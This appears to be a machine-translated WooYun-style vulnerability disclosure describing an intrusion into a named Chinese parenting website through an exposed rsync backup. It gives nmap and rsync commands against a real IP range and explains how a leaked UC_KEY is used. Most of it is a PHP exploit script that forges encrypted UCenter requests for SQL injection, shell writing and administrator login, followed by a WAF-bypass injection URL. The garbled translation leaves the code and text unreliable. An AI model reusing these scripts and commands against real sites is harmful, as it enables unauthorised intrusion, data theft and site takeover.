Parental network rsync Information Leakage source code causes security problems

See rsync this article http://www.bkjia.com/Article/201307/226273.html, casually find a try hand, also involves UC_KEY utilization, transit script and other ideas.
Www.fumu.com ip 210.14.136.87 follow the tutorial provided in the article and use the command to scan rsync in section C to try nmap-n -- open-p 873 210.14.136.1-255. When I connect to the 93 server, I am pleasantly surprised: rsync 210.14.136:: The main site uses phpcms. The phpcms module here should be the backup master site code. The bak directory seems to have backed up all the code. Check that rsync 210.14.136.93: bak has many directories. Find UC_KEY rsync 210.14.136.93: bak/newbbs/config/has uc, find the config. inc. php synchronization to see the content: rsync-vzrtopg -- progress 210.14.136.93: bak/uc/data/config. inc. php/Users/test/fumubak rsync-vzrtopg -- progress 210.14.136.93, find UC_KEY. What can I do if I get the UC_KEY? I can do more well. For details, refer to the previous WooYun: qibo cms full-site system (formerly PHP168) vulnerability in milk tanks) improper configuration can cause any user to log in and use the functions in UC_KEY to call them directly. Check uc. function in php: rsync-vzrtopg -- progress 210.14.136.93: bak/newbbs/api/uc. php/Users/test/fumubak/db can see updateapps writing files. This is a shell Write Vulnerability. After testing for a long time, the var_export function is ignored and the single quotation marks are escaped, it cannot be truncated ...... At the same time, synlogin allows you to set cookies and log on as an administrator. However, you need to enter the password again when dz enters the background and cannot enter the background. Finally, we found that deleteuser has an SQL injection, which is also used http://drops.wooyun.org/tips/125 Train of Thought. Change the script of the milk tank to a proxy to facilitate injection:

<? Phperror_reporting (0); $ host = "bbs.fumu.com"; // $ doing = $ argv [2]; $ time = time () + 10*3600; $ getshell = 0; // if ($ doing = 'login') {// synlogin, but only log on to the first admin account. if uid1 is not an administrator, you need to manually find // $ code = 'time = '. $ time. '& uid = 1 & username = administrator & action = synlogin'; //} elseif ($ doing = 'shell') {// $ code = 'time = '. $ time. '& action = updateapps'; //} elseif ($ doing = 'temp ') {// $ code = 'time = '. $ time. '& Ids = 203881) and 1 = 1 & action = deleteuser '; //} else {// $ doing = 'test'; // $ code = 'time = '. $ time. '& action = '. $ doing; //} $ sqlin =$ _ GET ['id']; $ sqlin = str_replace ("", "% 20", $ sqlin ); $ sqlin = str_replace ("=", "% 3D", $ sqlin); $ code = 'time = '. $ time. "& ids = $ sqlin & action = deleteuser"; $ uc_key = array (// 'null' => '', 'bbs '=> '59xxxxxxxxxxxxxx9ib ', // 'www '=> 'cf5xxxxxxxxxxxxxxxxxxxqay2y'); foreach ($ uc_key as $ key =>$ Value) {$ exp = 'api/uc. php? Code = '. urlencode (authcode ($ code, "ENCODE", $ value); // echo "http: // $ host/$ exp"; $ result = file_get_contents ("http: // $ host/$ exp "); print_r ($ result); // $ status = get_headers (" http: // $ host/$ exp "); // if ($ result! = 'Authracation has expiried' & strpos ($ status [0], '000000')> 0) {// echo $ result; // echo "[+] UC_KEY '$ key' can use. \ r \ n "; // echo" [*] EXP = $ exp \ r \ n ";/* if ($ getshell = 1) {// Get shell echo "[+] Getshell... \ r \ n "; $ cmd = array ('one' => '<? Xml version = "1.0" encoding = "ISO-8859-1"?> <Root> <item id = "appid"> 123 \ '); phpinfo (); // </item> </root> '); foreach ($ cmd as $ key = >$ value) {$ res = send ($ host, $ exp, $ value) ;}$ getshell = 0 ;} print ("[+] Try to http: // $ host/member/api/client/data/cache/apps. php or http: // $ host/uc_client/data/cache/apps. php \ r \ n "); * //} else {// echo" [+] UC_KEY '$ key '". $ result. "\ r \ n"; //} function send ($ host, $ code, $ cmd) {$ message = "POST /". $ code. "HTTP/1. 1 \ r \ n "; $ message. = "Accept: */* \ r \ n"; $ message. = "Referer :". $ host. "\ r \ n"; $ message. = "Accept-Language: zh-cn \ r \ n"; $ message. = "Content-Type: application/x-www-form-urlencoded \ r \ n"; $ message. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1) \ r \ n"; $ message. = "Host :". $ host. "\ r \ n"; $ message. = "Content-Length :". strlen ($ cmd ). "\ r \ n"; $ message. = "Connection: Close \ r \ n "; $ Message. = $ cmd; $ fp = fsockopen ($ host, 80); fputs ($ fp, $ message); $ resp = ''; while ($ fp &&! Feof ($ fp) $ resp. = fread ($ fp, 1024); return $ resp;} function authcode ($ string, $ operation = 'decode', $ key = '', $ expiry = 0) {$ ckey_length = 4; $ key = md5 ($ key? $ Key: UC_KEY); $ keya = md5 (substr ($ key, 0, 16); $ keyb = md5 (substr ($ key, 16, 16 )); $ keyc = $ ckey_length? ($ Operation = 'decode '? Substr ($ string, 0, $ ckey_length): substr (md5 (microtime (),-$ ckey_length): ''; $ cryptkey = $ keya. md5 ($ keya. $ keyc); $ key_length = strlen ($ cryptkey); $ string = $ operation = 'decode '? Base64_decode (substr ($ string, $ ckey_length): sprintf ('% 010d', $ expiry? $ Expiry + time (): 0 ). substr (md5 ($ string. $ keyb), 0, 16 ). $ string; $ string_length = strlen ($ string); $ result = ''; $ box = range (0,255); $ rndkey = array (); for ($ I = 0; $ I <= 255; $ I ++) {$ rndkey [$ I] = ord ($ cryptkey [$ I % $ key_length]);} for ($ j = $ I = 0; I I <256; $ I ++) {$ j = ($ j + $ box [$ I] + $ rndkey [$ I]) % 256; $ tmp = $ box [$ I]; $ box [$ I] = $ box [$ j]; $ box [$ j] = $ tmp;} for ($ a = $ j = $ I = 0; $ I <$ string_length; $ I ++) {$ a = ($ a + 1) % 256; $ j = ($ j + $ box [$ a]) % 256; $ tmp = $ box [$ a]; $ box [$ a] = $ box [$ j]; $ box [$ j] = $ tmp; $ result. = chr (ord ($ string [$ I]) ^ ($ box [($ box [$ a] + $ box [$ j]) % 256]);} if ($ operation = 'decode') {if (substr ($ result, 0, 10) = 0 | substr ($ result, 0, 10) -time ()> 0) & substr ($ result, 10, 16) = substr (md5 (substr ($ result, 26 ). $ keyb), 0, 16) {return substr ($ result, 26) ;}else {return '';}} else {return $ keyc. str_replace ('=', '', base64_encode ($ result ));}}

 

From the notes in the script, we can also see that the test process is too painful... We thought it would be okay to inject smoothly. There is also an injection function in/source/class/class_core.php ...... Bypass Method: http: // 127.0.0.1/ucbbs. php? Id = 1) % 20and % 20 (/*! Select */% 201% 20 FROM % 20 (/*! Select */% 20 count (*), concat (floor (rand (0) * 2 ),(/*! Select */% 20 version () a % 20 from % 20information_schema.tables % 20 group % 20by % 20a) B) % 20and % 20 (1) = (1
There are other things, don't do it, but I found shell in rsync, but I didn't find the location, and uc.fumu.com was all hacked. Do you want to participate in a wooyun public test to ensure security? Proof of vulnerability:
  Solution:

Reference: http://www.bkjia.com/Article/201307/226273.html